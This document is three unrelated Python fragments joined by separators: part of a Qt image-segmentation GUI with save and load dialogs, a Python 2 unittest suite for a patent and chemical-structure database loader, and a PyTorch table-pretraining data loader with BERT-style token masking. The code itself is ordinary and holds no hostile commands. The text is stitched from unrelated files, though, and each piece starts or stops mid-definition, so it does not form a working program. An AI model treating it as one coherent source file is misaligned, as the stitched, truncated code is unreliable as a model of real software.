self.setFocusPolicy(Qt.StrongFocus)
# self.test_btn.clicked.connect(self.test_fun)
def resizeEvent(self, event: QResizeEvent):
if event.size().width() < 800:
self.batch_processing_btn.hide()
else:
self.batch_processing_btn.show()
def keyPressEvent(self, event: QKeyEvent):
if event.matches(QKeySequence.Save):
self.save_file()
elif event.matches(QKeySequence.Open):
self.load_data()
super().keyPressEvent(event)
def save_file(self):
base_values = self.settings.get("save_parameters", dict())
dial = SaveDialog(
save_dict, system_widget=False, base_values=base_values, history=self.settings.get_path_history()
)
dial.selectFile(os.path.splitext(os.path.basename(self.settings.image_path))[0])
dial.setDirectory(
self.settings.get("io.save_directory", self.settings.get("io.open_directory", str(Path.home())))
)
dial.selectNameFilter(self.settings.get("io.save_filter", ""))
if dial.exec():
save_location, selected_filter, save_class, values = dial.get_result()
project_info = self.settings.get_project_info()
self.settings.set("io.save_filter", selected_filter)
save_dir = os.path.dirname(save_location)
self.settings.set("io.save_directory", save_dir)
self.settings.add_path_history(save_dir)
base_values[selected_filter] = values
def exception_hook(exception):
from qtpy.QtCore import QMetaObject
from qtpy.QtWidgets import QApplication
instance = QApplication.instance()
if isinstance(exception, ValueError):
instance.warning = "Save error", f"Error during saving\n{exception}"
QMetaObject.invokeMethod(instance, "show_warning", Qt.QueuedConnection)
else:
raise exception
dial2 = ExecuteFunctionDialog(
save_class.save, [save_location, project_info, values], exception_hook=exception_hook
)
dial2.exec()
def mask_manager(self):
if self.settings.segmentation is None:
QMessageBox.information(self, "No segmentation", "Cannot create mask without segmentation")
return
dial = MaskDialog(self.settings)
dial.exec_()
def load_data(self):
def exception_hook(exception):
from qtpy.QtCore import QMetaObject
from qtpy.QtWidgets import QApplication
instance = QApplication.instance()
if isinstance(exception, ValueError) and exception.args[0] == "Incompatible shape of mask and image":
instance.warning = (
"Open error",
"Most probably you try to load mask from other image. " "Check selected files",
)
QMetaObject.invokeMethod(instance, "show_warning", Qt.QueuedConnection)
elif isinstance(exception, MemoryError):
instance.warning = "Open error", f"Not enough memory to read this image: {exception}"
QMetaObject.invokeMethod(instance, "show_warning", Qt.QueuedConnection)
elif isinstance(exception, IOError):
instance.warning = "Open error", f"Some problem with reading from disc: {exception}"
QMetaObject.invokeMethod(instance, "show_warning", Qt.QueuedConnection)
elif isinstance(exception, KeyError):
instance.warning = "Open error", f"Some problem project file: {exception}"
QMetaObject.invokeMethod(instance, "show_warning", Qt.QueuedConnection)
print(exception, file=sys.stderr)
elif isinstance(exception, WrongFileTypeException):
instance.warning = (
"Open error",
"No needed files inside archive. Most probably you choose file from segmentation mask",
)
QMetaObject.invokeMethod(instance, "show_warning", Qt.QueuedConnection)
else:
raise exception
try:
dial = CustomLoadDialog(load_functions.load_dict, history=self.settings.get_path_history())
dial.setDirectory(self.settings.get("io.open_directory", str(Path.home())))
dial.selectNameFilter(self.settings.get("io.open_filter", next(iter(load_functions.load_dict.keys()))))
if dial.exec_():
result = dial.get_result()
self.settings.set("io.open_filter", result.selected_filter)
load_dir = os.path.dirname(result.load_location[0])
self.settings.set("io.open_directory", load_dir)
self.settings.add_path_history(load_dir)
dial2 = ExecuteFunctionDialog(
result.load_class.load,
[result.load_location],
{"metadata": {"default_spacing": self.settings.image_spacing}},
exception_hook=exception_hook,
)
if dial2.exec():
result = dial2.get_result()
self.set_data(result)
except ValueError as e:
QMessageBox.warning(self, "Open error", "{}".format(e))
def batch_window(self):
if self.main_window.batch_window is not None:
if self.main_window.batch_window.isVisible():
self.main_window.batch_window.activateWindow()
else:
self.main_window.batch_window.show()
else:
self.main_window.batch_window = BatchWindow(self.settings)
self.main_window.batch_window.show()
def advanced_window_show(self):
if self.main_window.advanced_window.isVisible():
self.main_window.advanced_window.activateWindow()
else:
self.main_window.advanced_window.show()
class MaskDialog(MaskDialogBase):
def next_mask(self):
project_info: ProjectTuple = self.settings.get_project_info()
mask_property = self.mask_widget.get_mask_property()
self.settings.set("mask_manager.mask_property", mask_property)
mask = calculate_mask_from_project(mask_description=mask_property, project=project_info)
self.settings.add_history_element(create_history_element_from_project(project_info, mask_property,))
if self.settings.history_redo_size():
history: HistoryElement = self.settings.history_next_element()
self.settings.set("current_algorithm", history.segmentation_parameters["algorithm_name"])
self.settings.set(
f"algorithm.{history.segmentation_parameters['algorithm_name']}",
history.segmentation_parameters["values"],
)
self.settings.mask = mask
self.close()
| |
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import logging
import unittest
from datetime import date
from sqlalchemy import create_engine, select, and_
from src.scripts.data_loader import DataLoader, DocumentClass, DocumentField
logging.basicConfig( format='%(asctime)s %(levelname)s %(name)s %(message)s', level=logging.INFO)
class DataLoaderTests(unittest.TestCase):
###### Preparation / bootstrapping ######
def setUp(self):
self.db = create_engine('sqlite:///:memory:', echo=False)
self.test_classifications = ("TEST_CLASS1","TEST_CLASS2","TEST_CLASS3","TEST_CLASS4", "TEST_CLASS7")
# Create the object under test, use it to create the schema
self.loader = DataLoader( self.db, self.test_classifications )
self.metadata = self.loader.db_metadata()
self.metadata.create_all(self.db)
def test_create_doc_loader(self):
self.failUnless( isinstance(self.loader, DataLoader) )
###### Biblio loading tests ######
def test_write_document_record(self):
result = self.load_n_query('data/biblio_single_row.json')
row = result.fetchone()
self.check_doc_row(row, (1,'WO-2013127697-A1',date(2013,9,6),0,47747634))
def test_write_docs_many(self):
result = self.load_n_query('data/biblio_typical.json')
rows = result.fetchall()
self.failUnlessEqual( 25, len(rows) )
self.check_doc_row( rows[0], (1,'WO-2013127697-A1',date(2013,9,6),0,47747634) )
self.check_doc_row( rows[1], (2,'WO-2013127698-A1',date(2013,9,6),0,47748611) )
self.check_doc_row( rows[24], (25,'WO-2013189394-A2',date(2013,12,27),0,49769540) )
def test_write_docs_duplicates_handled(self):
self.load(['data/biblio_single_row.json'])
self.load(['data/biblio_typical.json'])
rows = self.query_all(['schembl_document']).fetchall()
self.failUnlessEqual( 25, len( rows ) )
self.check_doc_row( rows[0], (1,'WO-2013127697-A1',date(2013,9,6),0,47747634) )
def test_unexpected_disallowed_duplicate(self):
try:
self.load(['data/biblio_single_row.json'])
DataLoader( self.db, self.test_classifications, allow_doc_dups=False ).load_biblio('data/biblio_typical.json')
self.fail("Exception was expected")
except RuntimeError,exc:
self.failUnlessEqual("An Integrity error was detected when inserting document WO-2013127697-A1. This indicates "\
"insertion of an existing document, but duplicates have been disallowed", exc.message)
def test_sequence_definitions(self):
mdata = self.loader.db_metadata()
self.failUnlessEqual( 'schembl_document_id', mdata.tables['schembl_document'].c.id.default.name )
def test_titles(self):
result = self.load_n_query('data/biblio_typical.json', ['schembl_document_title'])
rows = result.fetchall()
self.failUnlessEqual( 62, len(rows) )
# Row ordering is based on dictionary; may be brittle
self.check_title_row( rows[0], (1, "FR", u"UTILISATION D'UN FILM ADHÉSIF À RÉACTIVITÉ LATENTE POUR LE COLLAGE DE PLASTIQUE SUR DE L'ALUMINIUM ANODISÉ") )
self.check_title_row( rows[1], (1, "DE", u"VERWENDUNG EINES LATENTREAKTIVEN KLEBEFILMS ZUR VERKLEBUNG VON ELOXIERTEM ALUMINIUM MIT KUNSTSTOFF") )
self.check_title_row( rows[2], (1, "EN", u"USE OF A LATENTLY REACTIVE ADHESIVE FILM FOR ADHESIVE BONDING OF ELOXATED ALUMINIUM TO PLASTIC") )
self.check_title_row( rows[56], (24,"FR", u"PROCÉDÉ DE PILOTAGE DE MISE EN FORME DE TRAFIC ET ORGANE PILOTAGE") )
self.check_title_row( rows[57], (24,"EN", u"TRAFFIC SHAPING DRIVE METHOD AND DRIVER") )
self.check_title_row( rows[58], (24,"ZH", u"一种流量整形的驱动方法及驱动器") )
self.check_title_row( rows[59], (25,"FR", u"PROCÉDÉ, SYSTÈME ET DISPOSITIF D'ACQUISITION D'INFORMATIONS SUR LES RESSOURCES, POUR DISPOSITIF TERMINAL DE L'INTERNET DES OBJETS") )
self.check_title_row( rows[60], (25,"EN", u"RESOURCE INFORMATION ACQUISITION METHOD, SYSTEM AND DEVICE FOR INTERNET OF THINGS TERMINAL DEVICE") )
self.check_title_row( rows[61], (25,"ZH", u"一种物联网终端设备的资源信息获取方法、系统及设备") )
def test_titles_duplicate(self):
rows = self.load_n_query('data/biblio_dup_titles.json', ['schembl_document_title']).fetchall()
self.failUnlessEqual( 4, len(rows) )
self.check_title_row( rows[0], (1, "FR", u"UTILISATION D'UN FILM ADHÉSIF À RÉACTIVITÉ LATENTE POUR LE COLLAGE DE PLASTIQUE SUR DE L'ALUMINIUM ANODISÉ") )
self.check_title_row( rows[1], (1, "DE", u"VERWENDUNG EINES LATENTREAKTIVEN KLEBEFILMS ZUR VERKLEBUNG VON ELOXIERTEM ALUMINIUM MIT KUNSTSTOFF") )
self.check_title_row( rows[2], (1, "EN", u"USE OF A LATENTLY REACTIVE ADHESIVE FILM FOR ADHESIVE BONDING") )
self.check_title_row( rows[3], (2, "DE", u"VERWENDUNG EINES LATENTREAKTIVEN KLEBEFILMS ZUR VERKLEBUNG VON ELOXIERTEM ALUMINIUM MIT KUNSTSTOFF") )
def test_classifications_simple(self):
result = self.load_n_query('data/biblio_single_row.json', ['schembl_document_class'])
rows = result.fetchall()
self.check_class_row( rows[0], (1, "B29C", DocumentClass.IPC) )
def test_classifications_all(self):
self.load_n_query('data/biblio_typical.json')
# Check a document with all classifications
self.verify_classes( 1, DocumentClass.IPC, ["B29C"])
self.verify_classes( 1, DocumentClass.ECLA, ["B29C"])
self.verify_classes( 1, DocumentClass.IPCR, ["B29C 65/50","B32B 37/12","B32B 7/12","C08K 5/29","C08K 5/32","C09J 7/00","C09J 7/02","C09J 7/04"])
self.verify_classes( 1, DocumentClass.CPC, ["B29C 65/4835","B29C 65/5057","B29C 66/7422","B32B 2038/042","B32B 2309/02","B32B 2309/04","B32B 2309/12","B32B 2457/00","B32B 37/0046","B32B 37/1207","B32B 38/1841","B32B 7/12","C08J 5/12","C09J 2205/102","C09J 2475/00","C09J 5/00","C09J 7/00","C09J 7/0203","C09J 7/043"])
# Check documents with none / some
self.verify_classes( 2, DocumentClass.IPC, [])
self.verify_classes( 2, DocumentClass.ECLA, [])
self.verify_classes( 2, DocumentClass.IPCR, [])
self.verify_classes( 2, DocumentClass.CPC, [])
self.verify_classes( 25, DocumentClass.IPC, [])
self.verify_classes( 25, DocumentClass.ECLA, [])
self.verify_classes( 25, DocumentClass.IPCR, ["H04L 29/08"])
self.verify_classes( 25, DocumentClass.CPC, ["H04L 29/08"])
def test_classes_define_life_sci_flag(self):
# Checks that classifications determine the life_sci_relevant flag, when:
# - relevant classes present in ipc/ipcr/ecla/cpc fields (sole value)
# - relevant class appears as a prefix
# - mixed in with other/similar codes (before / after)
result = self.load_n_query('data/biblio_typical.json')
rows = result.fetchall()
relevant = set(['WO-2013127700-A1','WO-2013127701-A2','WO-2013127702-A1','WO-2013127703-A1','WO-2013127704-A1',
'WO-2013127705-A1','WO-2013127707-A1','WO-2013127708-A1','WO-2013127712-A1','WO-2013127714-A1'])
for row in rows:
expect_relevant = row['scpn'] in relevant
self.failUnlessEqual(int(expect_relevant), row['life_sci_relevant'])
def test_classifications_set(self):
default_classes = set(["A01", "A23", "A24", "A61", "A62B","C05", "C06", "C07", "C08", "C09", "C10", "C11", "C12", "C13", "C14","G01N"])
local_loader = DataLoader(self.db)
self.failUnlessEqual( default_classes, local_loader.relevant_classifications() )
self.failUnlessEqual( self.test_classifications, self.loader.relevant_classifications() )
def test_missing_data_handled(self):
rows = self.load_n_query('data/biblio_missing_data.json').fetchall()
self.failUnlessEqual( 3, len(rows) )
self.check_doc_row( rows[0], (1,'WO-2013127697-A1',date(2013,9,6),0,47747634) )
self.check_doc_row( rows[1], (2,'WO-2013127698-A1',date(2013,9,6),0,47748611) )
self.check_doc_row( rows[2], (3,'WO-2013189394-A2',date(2013,12,27),0,49769540) )
def test_missing_mandatory_data(self):
self.expect_runtime_error('data/biblio_missing_scpn.json', "Document is missing mandatory biblio field (KeyError: 'pubnumber')")
self.expect_runtime_error('data/biblio_missing_pubdate.json', "Document is missing mandatory biblio field (KeyError: 'pubdate')")
self.expect_runtime_error('data/biblio_missing_familyid.json', "Document is missing mandatory biblio field (KeyError: 'family_id')")
self.expect_runtime_error('data/biblio_empty_scpn.json', "Document publication number field is empty")
def test_disable_titles(self):
simple_loader = DataLoader( self.db, self.test_classifications, load_titles=False )
simple_loader.load_biblio( 'data/biblio_typical.json' )
rows = self.query_all(['schembl_document_title']).fetchall()
self.failUnlessEqual(0, len(rows))
def test_disable_classifications(self):
simple_loader = DataLoader( self.db, self.test_classifications, load_classifications=False )
simple_loader.load_biblio( 'data/biblio_typical.json' )
rows = self.query_all(['schembl_document_class']).fetchall()
self.failUnlessEqual(0, len(rows))
def test_replace_document(self):
simple_loader = DataLoader( self.db, self.test_classifications, overwrite=True )
simple_loader.load_biblio( 'data/biblio_typical.json' )
rows = self.query_all(['schembl_document']).fetchall()
self.failUnlessEqual( 25, len(rows) )
self.check_doc_row( rows[0], (1,'WO-2013127697-A1',date(2013,9,6),0,47747634) )
self.check_doc_row( rows[18], (19,'WO-2013189302-A1',date(2013,12,27),0,49768126) )
simple_loader.load_biblio( 'data/biblio_typical_update.json' )
rows = self.query_all(['schembl_document']).fetchall()
self.failUnlessEqual( 25, len(rows) )
self.check_doc_row( rows[0], (1,'WO-2013127697-A1',date(2013,9,5),0,47474747) )
self.check_doc_row( rows[18], (19,'WO-2013189302-A1',date(2013,12,31),1,47474748) ) # This record is now life-sci-relevant
def test_replace_titles(self):
# Covers deletion of obsolete titles, insertion of new titles, and modification of existing records
updating_loader = DataLoader( self.db, self.test_classifications, overwrite=True )
updating_loader.load_biblio( 'data/biblio_typical.json' )
self.verify_titles( 1, {'DE':u"VERWENDUNG EINES LATENTREAKTIVEN KLEBEFILMS ZUR VERKLEBUNG VON ELOXIERTEM ALUMINIUM MIT KUNSTSTOFF",
'FR':u"UTILISATION D'UN FILM ADHÉSIF À RÉACTIVITÉ LATENTE POUR LE COLLAGE DE PLASTIQUE SUR DE L'ALUMINIUM ANODISÉ",
'EN':u"USE OF A LATENTLY REACTIVE ADHESIVE FILM FOR ADHESIVE BONDING OF ELOXATED ALUMINIUM TO PLASTIC" } )
updating_loader.load_biblio( 'data/biblio_typical_update.json' )
self.verify_titles( 1, {'DE':u"Dis ist der neu titlen",
'ZH':u"寻设备息的传消呼方法和输" } )
def test_replace_classes(self):
# Covers deletion of obsolete classes, insertion of new classes, and modification of existing records
updating_loader = DataLoader( self.db, self.test_classifications, overwrite=True )
updating_loader.load_biblio( 'data/biblio_typical.json' )
self.verify_classes( 19, DocumentClass.IPC, [])
self.verify_classes( 19, DocumentClass.ECLA, [])
self.verify_classes( 19, DocumentClass.IPCR, ["H04W 68/02"])
self.verify_classes( 19, DocumentClass.CPC, ["H04W 68/005"])
updating_loader.load_biblio( 'data/biblio_typical_update.json' )
self.verify_classes( 19, DocumentClass.IPC, ["TEST_CLASS1"]) # Doc now has one IPC class (insertion - life sci relevant)
self.verify_classes( 19, DocumentClass.ECLA, ["H04W 76/02"]) # Doc now has one ECLA class (insertion)
self.verify_classes( 19, DocumentClass.IPCR, ["B32B 37/12","H04W 68/02"]) # Doc now has one extra IPCR (1 unchanged, 1 insert)
self.verify_classes( 19, DocumentClass.CPC, []) # Doc now has zero CPC classes (deletion)
###### Chem loading tests ######
def test_write_chem_record(self):
self.load(['data/biblio_single_row.json','data/chem_single_row.tsv'])
row = self.query_all(['schembl_chemical']).fetchone()
self.check_chem_row( row, (9724,960.805,86708,1,0,1.135,4,20,6,9) )
def test_write_chem_text(self):
self.load(['data/biblio_single_row.json','data/chem_single_row.tsv'])
row = self.query_all(['schembl_chemical_structure']).fetchone()
self.check_struct_row( row,
(9724, "[Na+].[Na+].[Na+].[Na+].CC1=CC(=CC=C1\N=N\C1=C(O)C2=C(N)C=C(C=C2C=C1S([O-])(=O)=O)S([O-])(=O)=O)C1=CC(C)=C(C=C1)\N=N\C1=C(O)C2=C(N)C=C(C=C2C=C1S([O-])(=O)=O)S([O-])(=O)=O",
"InChI=1S/C34H28N6O14S4.4Na/c1-15-7-17(3-5-25(15)37-39-31-27(57(49,50)51)11-19-9-21(55(43,44)45)13-23(35)29(19)33(31)41)18-4-6-26(16(2)8-18)38-40-32-28(58(52,53)54)12-20-10-22(56(46,47)48)14-24(36)30(20)34(32)42;;;;/h3-14,41-42H,35-36H2,1-2H3,(H,43,44,45)(H,46,47,48)(H,49,50,51)(H,52,53,54);;;;/q;4*+1/p-4/b39-37+,40-38+;;;;",
"GLNADSQYFUSGOU-GPTZEZBUSA-J"))
def test_typical_chemfile(self):
# Load chemical data, and check:
# 1) Many structures loaded, 2) duplicates handled, 3) Various values (negation etc) 4) chunking
# Rows are assumed to be in insertion order, matching input file
self.load( ['data/biblio_typical.json','data/chem_typical.tsv'], chunk_parm=7 )
chem_table = self.metadata.tables['schembl_chemical']
struct_table = self.metadata.tables['schembl_chemical_structure']
s = select( [chem_table, struct_table] )\
.where( chem_table.c.id == struct_table.c.schembl_chem_id )\
.order_by( chem_table.c.id )
rows = self.db.execute(s).fetchall()
self.failUnlessEqual( 19, len(rows) )
self.check_chem_row( rows[0], (48, 94.111, 2930353, 0, 0, 1.67, 1, 1, 1, 0) )
self.check_chem_row( rows[2], (1645, 146.188, 1077470, 1, 0, -3.215, 3, 4, 0, 5) )
self.check_chem_row( rows[8], (3001, 206.281, 275677, 1, 1, 3.844, 1, 2, 1, 4) )
self.check_struct_row( rows[0], (48, 'OC1=CC=CC=C1', 'InChI=1S/C6H6O/c7-6-4-2-1-3-5-6/h1-5,7H', 'ISWSIDIOOBJBQZ-UHFFFAOYSA-N') )
self.check_struct_row( rows[2], (1645, 'NCCCCC(N)C(O)=O', 'InChI=1S/C6H14N2O2/c7-4-2-1-3-5(8)6(9)10/h5H,1-4,7-8H2,(H,9,10)', 'KDXKERNSBIXSRK-UHFFFAOYSA-N') )
self.check_struct_row( rows[8], (3001, 'CC(C)CC1=CC=C(C=C1)C(C)C(O)=O', 'InChI=1S/C13H18O2/c1-9(2)8-11-4-6-12(7-5-11)10(3)13(14)15/h4-7,9-10H,8H2,1-3H3,(H,14,15)', 'HEFNNWSXXWATRW-UHFFFAOYSA-N') )
def test_mapping_loaded(self):
self.load(['data/biblio_single_row.json','data/chem_single_row_nohdr.tsv'])
rows = self.query_all(['schembl_document_chemistry']).fetchall()
exp_rows = [ (DocumentField.TITLE,11), (DocumentField.ABSTRACT,9), (DocumentField.CLAIMS,7), (DocumentField.DESCRIPTION,5), (DocumentField.IMAGES,3), (DocumentField.ATTACHMENTS,1)]
for expected, actual in zip(exp_rows, rows):
self.check_mapping_row( actual, (1, 9724) + expected )
def test_many_mappings(self):
self.load(['data/biblio_typical.json','data/chem_typical.tsv'])
expected_data = [ (1,9724,0,0,0,1,0,0), (1,23780,0,0,0,11,0,0),(1,23781,0,0,0,11,0,0),(1,25640,0,0,2,4,0,0),
(6,61749,0,0,0,1,0,0), (6,1645,11,22,33,44,55,66), (6,15396,0,0,0,4,0,0),
(9,48,0,0,0,2,0,0),
(10,48,0,0,0,2,0,0),
(11,48,0,0,0,2,0,0),
(12,48,0,0,0,2,0,0),
(13,48,0,0,0,2,0,0),
(16,1102,0,0,0,1,0,0),
(18,1645,11,22,33,44,55,66),
(20,1646,0,0,0,2,0,0),(20,2156,0,0,3,6,0,0), (20,2157,0,0,3,6,0,0), (20,2761,0,0,0,1,0,0), (20,2799,0,0,0,3,0,0), (20,3001,0,0,0,3,0,0), (20,3046,0,0,0,3,0,0), (20,3233,0,0,0,3,0,0), (20,3234,0,0,0,3,0,0), (20,3689,0,0,0,2,0,0)]
self.verify_chem_mappings(expected_data)
def test_malformed_files(self):
self.expect_runtime_error('data/chem_bad_header.tsv', "Malformed header detected in chemical data file")
self.expect_runtime_error('data/chem_wrong_columns.tsv', "Incorrect number of columns detected in chemical data file")
def test_duplicate_mappings(self):
self.load(['data/biblio_typical.json','data/chem_dup_mappings.tsv'])
expected_data = [ (20,1646,0,0,0,2,0,0),
(1,9724,0,0,0,1,0,0),
(1,23780,0,0,0,11,0,0),
(1,23781,0,0,0,11,0,0),
(18,1645,11,22,33,44,55,66)]
self.verify_chem_mappings(expected_data)
def test_replacement_mappings(self):
updating_loader = self.prepare_updatable_db(True)
self.load(['data/biblio_typical_update.json','data/chem_typical_update.tsv'], loader=updating_loader)
self.verify_chem_mappings([ (1,48,36,35,34,33,32,31), # New
(1,23780,901,902,903,904,905,906), # Updated
(1,10101010101,41,42,43,44,45,46) ], doc=1) # New
# Note that 9724, 23781, and 25640 are gone
self.verify_chemicals(
{ 10101010101: (459.45, 2930353, 0,0, 1.67, 1,1,1,0,
u"C[C@@H]1[C@H]2[C@H](O)[C@H]3[C@H](N(C)C)C(=C(C(=O)N)C(=O)[C@@]3(O)C(=C2C(=O)c4c(O)c(N)ccc14)O)O",
u"InChI=1S/C22H25N3O8/c1-6-7-4-5-8(23)15(26)10(7)16(27)11-9(6)17(28)13-14(25(2)3)18(29)12(21(24)32)20(31)22(13,33)19(11)30/h4-6,9,13-14,17,26,28-30,33H,23H2,1-3H3,(H2,24,32)/t6-,9+,13+,14-,17-,22-/m0/s1",
u"USMLMJGLDDOVEI-PLYBKPSTSA-N") } )
def test_update_mappings(self):
updating_loader = self.prepare_updatable_db(False)
self.load(['data/biblio_typical_update.json','data/chem_typical_update.tsv'], preload_docs=True, update_mappings=True, loader=updating_loader)
self.verify_chem_mappings([ (1,48,36,35,34,33,32,31), # New
(1,9724,0,0,0,1,0,0), # Untouched
(1,23780,901,902,903,904,905,906), # Updated
(1,23781,0,0,0,11,0,0), # Untouched
(1,25640,0,0,2,4,0,0), # Untouched
(1,10101010101,41,42,43,44,45,46) ], doc=1) # New
self.verify_chemicals(
{ 10101010101: (459.45, 2930353, 0,0, 1.67, 1,1,1,0,
u"C[C@@H]1[C@H]2[C@H](O)[C@H]3[C@H](N(C)C)C(=C(C(=O)N)C(=O)[C@@]3(O)C(=C2C(=O)c4c(O)c(N)ccc14)O)O",
u"InChI=1S/C22H25N3O8/c1-6-7-4-5-8(23)15(26)10(7)16(27)11-9(6)17(28)13-14(25(2)3)18(29)12(21(24)32)20(31)22(13,33)19(11)30/h4-6,9,13-14,17,26,28-30,33H,23H2,1-3H3,(H2,24,32)/t6-,9+,13+,14-,17-,22-/m0/s1",
u"USMLMJGLDDOVEI-PLYBKPSTSA-N") } )
def prepare_updatable_db(self, overwrite_mode):
updating_loader = DataLoader( self.db, self.test_classifications, overwrite=overwrite_mode )
| |
<gh_stars>10-100
from torch.utils.data import Dataset, DataLoader, Subset
from torch.utils.data.dataloader import default_collate
from torch.utils.data.sampler import Sampler
import torch
import torch.nn as nn
import torch.nn.functional as F
from base import BaseDataLoader
import pickle
import numpy as np
import json
import os
from tqdm import tqdm
from torch._six import container_abcs, string_classes, int_classes, FileNotFoundError
import re
import random
import copy
import itertools
import math
from multiprocessing import Pool
from functools import partial
import pdb
from model.transformers import BertTokenizer
def mask_tokens(inputs, tokenizer, mlm_probability=0.15):
""" Prepare masked tokens inputs/labels for masked language modeling: 80% MASK, 10% random, 10% original. """
labels = inputs.clone()
# We sample a few tokens in each sequence for masked-LM training (with probability args.mlm_probability defaults to 0.15 in Bert/RoBERTa)
probability_matrix = torch.full(labels.shape, mlm_probability)
special_tokens_mask = [list(map(lambda x: 1 if x == tokenizer.pad_token_id else 0, val)) for val in labels.tolist()]
probability_matrix.masked_fill_(torch.tensor(special_tokens_mask, dtype=torch.bool), value=0.0)
masked_indices = torch.bernoulli(probability_matrix).bool()
labels[~masked_indices] = -1 # We only compute loss on masked tokens
# 80% of the time, we replace masked input tokens with tokenizer.mask_token ([MASK])
indices_replaced = torch.bernoulli(torch.full(labels.shape, 0.8)).bool() & masked_indices
inputs[indices_replaced] = tokenizer.convert_tokens_to_ids(tokenizer.mask_token)
# 10% of the time, we replace masked input tokens with random word
indices_random = torch.bernoulli(torch.full(labels.shape, 0.5)).bool() & masked_indices & ~indices_replaced
random_words = torch.randint(len(tokenizer), labels.shape, dtype=torch.long)
inputs[indices_random] = random_words[indices_random]
# The rest of the time (10% of the time) we keep the masked input tokens unchanged
return inputs, labels
RESERVED_ENT_VOCAB = {0:{'wiki_id':'[PAD]'},
1:{'wiki_id':'[ENT_MASK]'},
2:{'wiki_id':'[PG_ENT_MASK]'},
3:{'wiki_id':'[CORE_ENT_MASK]'}
}
RESERVED_ENT_VOCAB_NUM = len(RESERVED_ENT_VOCAB)
def process_single_hybrid_table(input_table, config):
table_id,subject,pgEnt,pgTitle,secTitle,caption,headers,core_entities,core_entities_text,all_entities,entities,entities_text,entity_cand = input_table
tokenized_pgTitle = config.tokenizer.encode(pgTitle, max_length=config.max_title_length, add_special_tokens=False)
tokenized_meta = tokenized_pgTitle+\
config.tokenizer.encode(secTitle, max_length=config.max_title_length, add_special_tokens=False)
if caption != secTitle:
tokenized_meta += config.tokenizer.encode(caption, max_length=config.max_title_length, add_special_tokens=False)
tokenized_headers = [config.tokenizer.encode(z, max_length=config.max_header_length, add_special_tokens=False) for _,z in headers]
input_tok = []
input_tok_pos = []
input_tok_type = []
tokenized_meta_length = len(tokenized_meta)
input_tok += tokenized_meta
input_tok_pos += list(range(tokenized_meta_length))
input_tok_type += [0]*tokenized_meta_length
tokenized_headers_length = [len(z) for z in tokenized_headers]
input_tok += list(itertools.chain(*tokenized_headers))
input_tok_pos += list(itertools.chain(*[list(range(z)) for z in tokenized_headers_length]))
input_tok_type += [1]*sum(tokenized_headers_length)
input_ent = []
input_ent_text = []
input_ent_type = []
column_en_map = {}
row_en_map = {}
core_entity_mask = []
for e_i, (index, entity) in enumerate(entities):
input_ent.append(entity)
if len(entities_text[e_i])!=0:
input_ent_text.append(config.tokenizer.encode(entities_text[e_i], max_length=config.max_cell_length, add_special_tokens=False))
else:
input_ent_text.append([])
input_ent_type.append(3 if index[1]==subject else 4)
core_entity_mask.append(1 if index[1]==subject else 0)
if index[1] not in column_en_map:
column_en_map[index[1]] = [e_i]
else:
column_en_map[index[1]].append(e_i)
if index[0] not in row_en_map:
row_en_map[index[0]] = [e_i]
else:
row_en_map[index[0]].append(e_i)
input_length = len(input_tok) + len(input_ent)
assert len(input_tok) < config.max_input_tok
assert len(input_ent) < config.max_input_ent
meta_and_headers_length = tokenized_meta_length+sum(tokenized_headers_length)
assert len(input_tok) == meta_and_headers_length
#create input mask
tok_tok_mask = np.ones([len(input_tok), len(input_tok)], dtype=int)
if config.src == "train":
meta_ent_mask = np.ones([tokenized_meta_length, len(input_ent)], dtype=int)
else:
meta_ent_mask = np.zeros([tokenized_meta_length, len(input_ent)], dtype=int)
header_ent_mask = np.zeros([sum(tokenized_headers_length), len(input_ent)], dtype=int)
start_i = 0
header_span = {}
for h_i, (h_j, _) in enumerate(headers):
header_span[h_j] = (start_i, start_i+tokenized_headers_length[h_i])
start_i += tokenized_headers_length[h_i]
for e_i, (index, _) in enumerate(entities):
header_ent_mask[header_span[index[1]][0]:header_span[index[1]][1], e_i] = 1
ent_header_mask = np.transpose(header_ent_mask)
if config.src != "train":
header_ent_mask = np.zeros([sum(tokenized_headers_length), len(input_ent)], dtype=int)
input_tok_mask = [tok_tok_mask, np.concatenate([meta_ent_mask, header_ent_mask], axis=0)]
ent_meta_mask = np.ones([len(input_ent), tokenized_meta_length], dtype=int)
ent_ent_mask = np.eye(len(input_ent), dtype=int)
for _,e_is in column_en_map.items():
for e_i_1 in e_is:
for e_i_2 in e_is:
if config.src=="train" or (e_i_2<e_i_1 and input_ent[e_i_2]>=len(RESERVED_ENT_VOCAB)):
ent_ent_mask[e_i_1, e_i_2] = 1
for _,e_is in row_en_map.items():
for e_i_1 in e_is:
for e_i_2 in e_is:
if config.src=="train" or (e_i_2<e_i_1 and input_ent[e_i_2]>=len(RESERVED_ENT_VOCAB)):
ent_ent_mask[e_i_1, e_i_2] = 1
input_ent_mask = [np.concatenate([ent_meta_mask, ent_header_mask], axis=1), ent_ent_mask]
# prepend [CORE_ENT_MASK] to input, input_ent[1] = [CORE_ENT_MASK]
input_tok_mask[1] = np.concatenate([np.zeros([len(input_tok), 1], dtype=int),input_tok_mask[1]],axis=1)
input_ent = [config.entity_wikid2id['[CORE_ENT_MASK]']] + input_ent
input_ent_text = [[]] + input_ent_text
input_ent_type = [3] + input_ent_type
# prepend pgEnt to input_ent, input_ent[0] = pgEnt
if pgEnt!=-1:
input_tok_mask[1] = np.concatenate([np.ones([len(input_tok), 1], dtype=int),input_tok_mask[1]],axis=1)
else:
input_tok_mask[1] = np.concatenate([np.zeros([len(input_tok), 1], dtype=int),input_tok_mask[1]],axis=1)
input_ent = [pgEnt if pgEnt!=-1 else 0] + input_ent
input_ent_text = [tokenized_pgTitle[:config.max_cell_length]] + input_ent_text
input_ent_type = [2] + input_ent_type
new_input_ent_mask = [np.ones([len(input_ent), len(input_tok)], dtype=int), np.ones([len(input_ent), len(input_ent)], dtype=int)]
new_input_ent_mask[0][2:, :] = input_ent_mask[0]
new_input_ent_mask[1][2:, 2:] = input_ent_mask[1]
# process [CORE_ENT_MASK] mask
new_input_ent_mask[0][1, tokenized_meta_length:] = 0
if subject in header_span:
# assert header_span[0][0] == 0
new_input_ent_mask[0][1, tokenized_meta_length+header_span[subject][0]:tokenized_meta_length+header_span[subject][1]] = 1
new_input_ent_mask[1][1, 2:] = 0
new_input_ent_mask[1][2:, 1] = 0
if subject in column_en_map:
new_input_ent_mask[1][1, 2+column_en_map[subject][0]] = 1 # seed=1
# process pgEnt mask
if pgEnt==-1:
new_input_ent_mask[1][:, 0] = 0
new_input_ent_mask[1][0, :] = 0
input_ent_mask = new_input_ent_mask
